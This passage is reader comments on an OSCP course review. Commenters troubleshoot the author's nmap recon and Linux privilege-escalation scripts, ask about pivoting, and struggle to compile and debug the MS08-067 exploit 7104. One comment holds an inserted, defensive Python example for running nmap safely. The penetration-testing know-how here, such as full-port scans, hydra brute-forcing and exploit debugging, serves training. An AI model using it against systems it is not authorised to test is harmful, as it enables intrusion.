      Will be starting my OSCP in the near future when I prepared myself a bit more. doing prep courses like python, nmap & nmap scripting engine, playing with metasploitable2 … I just don’t have 15h a day to spend on this course like most people do. But I do think that with enough preparation, 90 days and maybe an additional 90 days I should be fine.

  101. R Singh says:

    Thank you so much Mike and Benjamin. I was running the scripts while in a different folder but when I ran the recon script from the same folder, there was no issue.

    Thanks again and great work Mike.

  102. Steve Campbell says:

    Hi Mike, I’ve been stuck on Bob for a week. I got a low priv shell and have tried numerous things, but I’m not sure if I’m going in the right direction. Can I ask you a couple of questions by email and get a nudge in the right direction?

  103. Johannes Hatting says:

    Hi Mike. First I wanna thank you for this great blog post and for the time you’ve spent answering people’s questions.
    I’m starting the OSCP in August and preparing myself by going through the topics in the syllabus.
    I feel pretty confident in most of the topics after lots of practice and I’ve been going through the megaprimers on sec. tube like you’ve recommended to others and feel I have an ok grasp of the buffer overflow topic and using Immunity and Gdb.

    At the moment I’m trying to debug, modify and compile the different exploits listed on your exploit sheet and like others I can’t get the 7104 service code exec (ms08-067) to work. I can see in an earlier answer from you that you’ve managed to get it to work, so I was hoping that you could show me how you do it, to learn from it?

    I’m trying on a win 2k pro SP4 and attaching services in Immunity, but I can’t seem to get it to crash in a way where I can find where EIP points. Every time it crashes it hits the SEH chain. I’ve tried exchanging the “JMP ESP” part in the code with “BBBB” or a “JMP ESP” from the USER32.dll module and setting a breakpoint there, also with “\xCC” in different places, but can’t seem to hit any of it. If you could get me started with getting EIP, maybe I could figure out the rest from there. As I read the exploit it puts the shellcode before (in lower mem.) the return address, then moves ESP (sub esp) before the shellcode and finally jumps to ESP and the shellcode.

    Best Regards.

  104. emilia says:

    Hi, thank you for this great blog. I have a really stupid question but I’ve asked 2 times via the contact form on the Offensive Security website without receiving any answer.

    Is it possible to pay for the course with Paypal? I’m from Italy.

    Thank you.

  105. Vex Woo says:

    Hi, Mike. Thanks for sharing. It’s a great tutorial for us in PWK.
    This is a good link provided by SecurityTube.

    Thanks ! Wish you good luck !

  106. OSCP student says:

    Hey Mike,

    Did you use your scripts in the lab environment? Did you run them once for every server or really for the complete range in one go?

    I’m having problems with some of the servers in terms of stability, e.g. the .202 server does not seem to receive an Nmap scan well, the Nmap scan is now running for 7 hours and is at 90% … Did you experience problems like this?

    Thx a lot for the scripts; adding the users to the user list seems relatively easy since a number can be found on one of the first servers using an Nmap SNMP scan … For passwords I just added the top 2000. Could you estimate how long a hydra session would run with 2000 passwords for one existing user?

    thx a lot for the info

    • Mike Czumak says:

      Thanks. I did use the lab to fine tune my scripts a bit and modified them as I went. I performed some basic discovery/scanning across all servers and then performed more robust targeted scans against each server as I went. You will find that certain hosts may take longer than others and you might want to adjust your scan parameters accordingly. For example, take a look at the parameters you’re passing to your nmap scans. Are you performing a full TCP and UDP scan for every server? If so, it’s going to take a long time. If you’re going to do one large scan you might choose to narrow down the scanned ports/services a bit to catch the low hanging fruit. Then you can adjust your scan parameters to make it more robust if you want to scan one or several servers in more depth. It’s hard for me to estimate how long a hydra session will take since it can vary depending on several factors including the service(s) you’re scanning, the response time from the target server, and the number of threads you’ve configured.

  107. OSCP student says:

    Hey Mike,

    If you want, send me an email? There are some questions I have on the scripts and some remarks as well.

    I did indeed just throw a full UDP and TCP scan (in parallel) at each server 🙂 In the mean time I got a little bit smarter at scanning and enumerating.

  108. Manish says:

    Hi Mike,

    I have found your article and it is really informative. I am trying to use your script but it is showing me an error. Although I am quite a beginner with the python scripting language. I am getting the following error after running the script.

    File “”, line 179, in
    f = open(‘results/exam/targets.txt’, ‘r’) # CHANGE THIS!! grab the alive hosts from the discovery scan for enum
    IOError: [Errno 2] No such file or directory: ‘results/exam/targets.txt’
    I have also changed this but still same error.
    I am using Kali platform.

    Thank you

    • Mike Czumak says:


      It’s exactly as it says…you don’t have the file/directory created. A couple of recommendations…first, spend some time researching the error as well as the basic file I/O operations within python to get a better understanding of how it works and how to fix it. Second, the scripts I provided were not meant to run out-of-the-box but rather to give an idea/concept of how I approached the course/exam. Had I had more time, I would have done a much better job of coding these. Don’t expect to simply use these as-is…instead review the approach, understand the concepts, and take the time to write your own.

      – Mike

  109. Danny Wong says:

    Hi Mike, Thanks for leaving the tip. I got it working as well based on your comment.

    “I simply had to add the following to get it to compile successfully: #pragma comment (lib, “User32.lib”).”

  110. Jennifer says:

    Hi, Mike,

    Thanks for sharing the great tutorial. It helps me a lot. I’ve got most of the boxes in the lab. But I have no clues with and Could you please send me an email and give some guidance on them?

    I appreciate your help,


    • Mike Czumak says:

      I’m not sure which two boxes those are (IPs vary) and I try to avoid giving any specific hints for how to pwn the boxes but I sent you an email in case you have a specific question that I can try to help with.

      • Sam G says:

        Hi Jennifer
        Which machine did you start with first? I am currently just in this state, I do not know where to start; they all look like they have vulnerabilities but I could not figure out where to start.

  111. Sam G says:

    Hi Mike

    That is a great tutorial and I am glad to see you still answering questions on this post. I finished the reading material and started working on the lab machines. Is there a good starting point in the lab, like the easiest one I should start with? Or should I just follow the numbers? I am scanning each machine but just do not know which one I should focus on first.

    Thank you for your help

    • Mike Czumak says:

      The thing to keep in mind here is that (in contrast to an actual pentesting engagement) all of these targets are vulnerable in some way so the starting point is really up to you. You’ll find that some may need to be tackled before others, but I simply started numerically and worked my way through the list (and took out as much of the “low hanging fruit” as possible).

  112. Ashish Kamble says:

    Hey Mike,

    I had a question for you.

    I have about 2 weeks left before my labs commence; can you point out what I should look at? Can you mail me? I had some more questions.


    • Mike Czumak says:

      What you should look at in the weeks remaining before you start the labs is really dependent upon your comfort level with the course material so it’s tough for me to help with. I sent you an email in case you have some more specific questions.

  113. David says:

    I’ve already passed OSCP but I wanted to ask some questions about your exploit excel sheet. How did you gather all those privilege escalation exploits? and how could you know the exact windows versions and service packs it works on? The same question goes for the exploits part.

    I just wanted to create my updated list of privilege escalation exploits with the exact versions and service packs as you did and share it. So please tell me.

    • Mike Czumak says:


      There are a few sources I used. Since, in this context, I was concerned with only those vulnerabilities that have corresponding exploits I started with exploit-db. You can either use a Google search (e.g. privilege escalation windows) or use the in-site advanced search function to narrow the results (e.g. set the platform to “windows” and search for “privilege escalation ms”). The exploits themselves typically either reference the affected version / SP or at least the MS # so you can look it up. You can also use a site like CVE Details, filter by OS and choose the desired vulnerability category (e.g. gain privileges). Then you can sort by exploits available. For completeness I also reference Technet directly for vulnerability version and service pack applicability.

      Hope this helps.

      – Mike

  114. Richard says:

    Great post. I highly appreciate it. I’m beginning prep work for OSCP and am trying to run your I apologize for asking but I keep getting “failed to open normal output file /root/scripts/recon_enum/results/exam/x.x.x.x/24.nmap for writing QUITTING” when running the script after defining the target IP range. Any ideas/hints? I admittedly am a Python beginner. Thanks.

  115. Felix says:

    Hi Mike,

    great job on the writeup!

    I was coming across your linuxprivchecker script and I think the ability to recommend some exploits for further investigation is outstanding as all the other automated Linux post exploitation tools don’t offer this feature (at least as far as I know, I think I have heard about some kind of semi commercial tool but I forgot the name).

    How have you created the exploit list? By hand? I can’t think of a way to extract the needed information from the edb website (using curl or something else) or from searchsploit. They are simply not organized enough I think. So, to make a long story short: I am interested in updating your script’s exploit db but have no idea how to do this without doing it manually 🙂 Any hints on this?

    Best regards and thx again for the great work!

    • Mike Czumak says:

      Thanks Felix. Yes, I did most of it manually, primarily using Google as my means to find/narrow down the applicable exploits

  116. prakash says:

    Hi Mike,

    First of all many congratulations on your OSCE certification. I was googling for OSCP certification and found your website and really it is very useful for those who are planning for offsec certifications. Please let me know one thing: before going to enroll, can I prepare all these topics by myself? I mean with Google’s help or with some SecurityTube sessions? Actually 10-12 years back I studied C and C++ and also I know a little bit about bash but don’t know about perl and python. I think these scripts will play a major role for the certification. Please suggest.


    • Mike Czumak says:

      I’m a big believer in self-study. I’ve acquired far more practical skills and knowledge on my own through reading and, more importantly, hands-on practice than I have in any formal education setting. So can you do it yourself? Absolutely. You just have to be willing to put in the time and work. Review the syllabus and start exploring the various concepts. I would just caution against trying to rush to get a certification just to have it. Instead, use it as a milestone in your personal education pursuits to test your knowledge and provide some rigor/purpose to your studies. Best of luck.

      – Mike

  117. Alex Meque says:

    Hello Mike,

    Glad to see your post, It is awesome.
    I need some help regarding IP 202.
    I am fighting with a web application on port 80 for 2 months.
    Please help me, i am running out of time.

    • Mike Czumak says:

      Sorry, just got to your comment. As I tell everyone, I won’t give answers but I sent you an email in case I can be of any help as a sounding board.

  118. Sharrone says:

    Hello! Thank you for this review. It is and will continue to be very informative. I am currently taking the course and wanted to see if you could share a sanitized version of your notes. Not with the systems but more specifically the part with the pentest process information. I am trying to make sure my notebook has plenty of detail and information from different points of view.

  119. niranjan says:

    nice article good information about offensive security…

  120. Christopher Hammond says:

    Very nice article, thanks, and congrats on the cert! I can’t believe people are asking for your notes. Even after you generously provided the scripts. Especially since the Offsec motto is: “Try harder!” and rtfm (read the freaking manual PG13 ver.) ;^); is generally the spirit of the linux community.

    I agree with you about writing your own version for the learning experience. Oh, and thanks for the links to assembly and debug tutorials. Karma will definitely hook you up! 😀

  121. Sumesh says:

    Hi Mike,

    I am trying exploit

    7104 is compiled successfully ,I am running from a xp machine, I have reverted the machine prior to exploiting but I get error 192.x.x.x\pipe\browser\failed for 7104 and RpcExceptionCode()=1722 for exploit 6841

    MSF exploit works fine, please help. I am trying to understand what is going wrong

  122. dturner says:

    This is a great post! I’m currently going through the course myself and your priv escalation scripts are awesome. Could you explain your priv escalation methodology as that is definitely my weakest point. Thanks in advance!

  123. jj says:

    Thanks for the great post, helped me think about how to approach the class.
    Just wanted to make a note I found a copy/paste bug that prevents mssqlEnum from being called (which probably means it’s not necessary), would be nice if there was a github for these scripts. Great writeup.

  124. Avik says:

    Hi Mike,
    Thanks for your script and exploit list. It’s really helped me pwn some systems in the OSCP lab. Still I have only 10 systems rooted, with 6 unprivileged shells. Would you mind sending me an e-mail to communicate?

    I don’t have many days left in the lab and I get stuck with privilege escalation every time. Instead of just relying on a list of exploits, I would like to know more about attacking strategies to hone my focus. Could you please help me on this!

  125. John Edwards says:

    Hi Mike,
    How would you typically use the reconscan scripts through pivoting e.g. let’s say you have compromised a machine in an internal network, got root and managed to setup a socks proxy on that machine via ssh. One would typically modify the proxychains file on the attacking machine and add the local socks port to it.

    Wouldn’t you then need to prefix “proxychains” to each command in the reconscan scripts e.g. nmap, hydra?



  126. John Edwards says:

    Hi Mike,
    That’s one of the best reviews on OSCP course on the Internet.

    Had a quick question about pivoting as I am working through the OSCP lab. Did you come across scenarios where you had to pivot through a Windows host to get to a different network? If yes, how did you achieve that – did you use Meterpreter or another technique(s)? Meterpreter seems to be the most popular technique over Windows and Linux systems.

    On Linux, one may get lucky and discover an openssh server.

    I am assuming that in the exam, you did not get tested on pivoting. Is that right? Just asking since meterpreter use appears to be quite limited in the exam.

    Thanks and Kind Regards,


  127. Tony G. says:

    Dear Mike,
    Thank you for the wonderful blog. I am able to compile 7104.c with Visual Studio C++ 2005 but can’t seem to get it working for XP. I have changed the ret address as per the return addresses on the metasploit netapi… but can’t get it to work on Windows XP SP2/3. Any help will be greatly appreciated.

  128. Dave says:

    Mike… I’ve come across exploit code for XP that is Visual Studio… is there a way to compile this on Linux, or should I buckle down and get VS 2008 Express (can’t find 2005 Express anywhere)?

  129. Hans Peter says:


    First: nice blog post! I’m doing the OSCP as well and you really helped me out a lot.
    Do you still have your KeepNote notes (not the ones of the lab, but the study notes)?


  130. Xionc says:

    Hello Mike,

    Thank you for your very interesting review of the PWB course. I am currently taking the PWK challenge and I have just finished the video and pdf materials. I started the network penetration with the lowest hanging fruits, which means MS08-067. I saw in comments on your site that I am not the first person that is struggling with the 7104 exploit from exploit-db. I also saw that you were able to compile and successfully run this exploit against network targets. Although I am able to compile this code in both Kali (mingw32) and Windows (Visual Studio 2010) with no errors, I cannot use it against any vulnerable host (both with wine and in a Windows environment). I receive the message that the connection failed. I have 100% exploitable targets (checked previously with metasploit) after a fresh revert.

    Could you share with me your working exploit source code? Thanks in advance.

  131. Siamak Heshmati says:

    Great review!
    Thanks for sharing your experience.
    I registered for the course 3 days ago.

  132. says:

    Hi Mike

    Tx for the review… My exam is on the 30 May and I’m stressing bigtime…
    I as well am currently at a wall, getting past restrictions; scripts will help for sure and any other tips that you can give that will help me in the exam… I did the CEH and played around for a while but I want to be a pen tester, that’s why I am doing this course… will be very thankful for any help


  133. Gina says:

    Hi Mike,

    I know this may be a novice question but when you ran scripts to do most of the enumeration, how did you have to annotate that in your report? Did you have to break it down step-by-step or just write something like “Script one was run to return IP, DNS and OS details.” Also, do you mind sharing how long your report ended up being?

  134. AC says:

    Hi Mike,
    Do these scripts work in Kali 2? I get the following error, even when forcing the script to be run under python 2.7

    Failed to open normal output file /root/scripts/recon_enum/XXXX.nmap

  135. mark says:

    I get this error. anyone knows how to fix? I modify the directories.

    INFO: Running general TCP/UDP nmap scans for
    INFO: Running general TCP/UDP nmap scans for
    Failed to open normal output file /root/scripts/recon_enum/results/exam/.nmap for writing
    Failed to open normal output file /root/scripts/recon_enum/results/exam/ for writing
    Process Process-2:
    Traceback (most recent call last):
    File "/usr/lib/python2.7/multiprocessing/", line 258, in _bootstrap
    File "/usr/lib/python2.7/multiprocessing/", line 114, in run
    self._target(*self._args, **self._kwargs)
    File "", line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File "/usr/lib/python2.7/", line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command 'nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/.nmap' -oX '/root/scripts/recon_enum/results/exam/nmap/_nmap_scan_import.xml' ' returned non-zero exit status 1
    Process Process-1:
    Traceback (most recent call last):
    File "/usr/lib/python2.7/multiprocessing/", line 258, in _bootstrap
    File "/usr/lib/python2.7/multiprocessing/", line 114, in run
    self._target(*self._args, **self._kwargs)
    File "", line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File "/usr/lib/python2.7/", line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command 'nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/' -oX '/root/scripts/recon_enum/results/exam/nmap/'' returned non-zero exit status 1

  136. Peter says:

    Hello, thank you for all the info, it is a great help with study prep!

    I am attempting to run your however I get the below errors for each new IP that is listed in the targets.txt file. I have created all required folders.

    Failed to open XML output file /root/scripts/recon_enum/results/exam/nmap/ for writing
    Process Process-1:
    Traceback (most recent call last):
    File "/usr/lib/python2.7/multiprocessing/", line 258, in _bootstrap
    File "/usr/lib/python2.7/multiprocessing/", line 114, in run
    self._target(*self._args, **self._kwargs)
    File "", line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File "/usr/lib/python2.7/", line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command 'nmap -vv -Pn -A -sC -sS -T 4 -p- -oN '/root/scripts/recon_enum/results/exam/' -oX '/root/scripts/recon_enum/results/exam/nmap/'' returned non-zero exit status 1

  137. Jack says:


    I am having trouble modifying your scripts.

    1. Can we see an example output of the script?
    2. What directories do we need to create to have the scripts run successfully?

  138. Ganesh Balaraman says:


    You are a genius making inventions in security. Very nice knowledge points. We came to know about this information through the Google Groups community.

    I have some clarifications on the exploit Python script:

    # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)

    How can we pull this information from exploit-db and update it in the script?

    Please advise.

  139. Ganesh Balaraman says:


    I tried running the linuxprivchecker script and it seems to be working. But Mike advised updating the exploit entries in the sploit section. I have checked the exploit-db database and the entries are totally different.

    Can anyone please help on this issue?

    Mike says in the script:

    # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
    # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} — current keywords are ‘kernel’, ‘proc’, ‘pkg’ (unused), and ‘os’

  140. says:

    I have completed my OSCP labs and will be taking the exam in the next month. I just need some pointers for Ubuntu and Windows Server 2008 machines, as I had a lot of difficulties with these two OSes, and pointers especially for these two with respect to the OSCP. Any general pointers for the exam will also be helpful.

  141. Bobby Digital says:

    What does “Solid Understanding of Networking” mean? I’m by no means a CCNA, but I’ve been in IT as a systems admin for several years, more on the server side of things and some networking, but mostly simpler things. I’m just trying to figure out if I have to worry about knowing how to subnet or something, or can the ability to build a network from scratch and set up VLANs be enough as a foundation for the OSCP? I assume that I should know the OSI layers, but what parts of it are important to the OSCP? I’m basically trying to figure out if my knowledge is enough to take a crack at the OSCP or if I’m going to need more knowledge to have less of a struggle doing the course. I already know that I’ll need to learn Python or Perl or both and brush up on Linux, but on the networking side I’m just trying to get more clarification. I don’t want to take the course until I’ve got a bit more in my skill set.

  142. Akis says:

    It was an extra directory /nmap/ which I did see 🙂

  143. STEVEN D CAMPBELL says:

    Akis: look at the paths in the error output. You’ll have to either recreate the same folder structure or modify the script.
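    The fix Steven describes, worked through as an added example (not the blog's own script): it drops blank target lines, creates the results directories the nmap flags write into, and passes the command as an argument list instead of a `shell=True` string. The directory layout and the one-target-per-line format are assumed from the paths in the tracebacks above.

```python
import os
import re
import subprocess

# Added example, not the blog's script. Assumed layout (from the tracebacks):
# results/<target>.nmap and results/nmap/<target>_nmap_scan_import.xml.

# Plain host/IP characters only: an empty line or shell metacharacters fail.
SAFE_TARGET = re.compile(r"^[A-Za-z0-9.\-]+$")

def is_safe_target(line):
    """True if the line is a plausible target and cannot reach a shell."""
    return bool(SAFE_TARGET.match(line))

def load_targets(text):
    """Usable lines of a targets file. Blank lines are dropped so they never
    become an empty target (the cause of the 'results/exam/.nmap' path in
    the error above); anything not a plain host/IP is rejected."""
    targets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if not is_safe_target(line):
            raise ValueError("refusing target line: %r" % line)
        targets.append(line)
    return targets

def build_tcp_scan(results_dir, target):
    """Create the output directories and return the scan as an argv list.
    makedirs(exist_ok=True) replaces the manual 'create all required folders'
    step, and a list instead of a shell string means no quoting problems and
    no way for targets.txt content to be interpreted by /bin/sh."""
    nmap_dir = os.path.join(results_dir, "nmap")
    os.makedirs(nmap_dir, exist_ok=True)
    normal_out = os.path.join(results_dir, target + ".nmap")
    xml_out = os.path.join(nmap_dir, target + "_nmap_scan_import.xml")
    return ["nmap", "-vv", "-Pn", "-A", "-sC", "-sS", "-T", "4", "-p-",
            "-oN", normal_out, "-oX", xml_out, target]

def run_scan(results_dir, target):
    """Run one scan; a missing binary or non-zero exit is reported, not raised."""
    argv = build_tcp_scan(results_dir, target)
    try:
        return subprocess.check_output(argv, stderr=subprocess.STDOUT)
    except (OSError, subprocess.CalledProcessError) as exc:
        print("scan of %s failed: %s" % (target, exc))
        return None
```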

  144. SWarsi says:

    Dear Mike,

    I have been working on the OSCP lab and in search of articles covering the course contents, to root all lab machines first. I have no doubt that this write-up of yours is the BEST!!! among all blogs. A BIG THANKS for this blog and scripts!!!
    I am going to try those scripts as I am stuck in the lab after rooting 18 machines (low hanging fruits). I hope you are still keeping an eye on this blog.


  145. SWarsi says:

    Hi Mike,

    Do you have any post exploitation script for Windows handy?


  146. SWarsi says:

    Hi Mike,

    I posted some comments earlier, but it looks like they did not go through. I want to repeat that your blog is by far the BEST I ever read for the OSCP, with a practical approach and all the important help. BIG THANKS to you for posting it along with the scripts.